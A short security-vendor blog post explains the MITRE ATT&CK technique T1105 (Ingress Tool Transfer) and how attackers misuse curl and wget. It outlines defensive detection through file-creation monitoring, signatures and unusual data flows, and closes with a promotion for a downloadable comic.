- Uptycs @ RSA
curl and wget can be quite the security headache for Linux defenders. While these commands are commonly used by attackers to download malicious tools, user agents, and more, they are also quite useful to Linux users to download completely benign data. This technique is known as T1105 - Ingress Tool Transfer where “adversaries may transfer tools or other files from an external system into a compromised environment”. The tools reside on an external system controlled by the adversary and are brought into the network via protocols such as FTP or SFTP. According to MITRE ATT&CK, this technique is incredibly common and used through a variety of methods. For example, APT41 will use cerutil while CoinTicker executes a Python script.
To detect this technique, we can monitor for file creation and files transferred into the network. While we should not rely on this method, we can look for signatures of what is being downloaded (attackers will likely change the signatures over time to evade detection, so this is not a fool proof method). On the behavioral side, we can detect uncommon data flows or transfers. For example, we can analyze network data to see if the client is sending more data than it receives from a server.
Want to see the full Sudo Science Comyc? Download your copy here.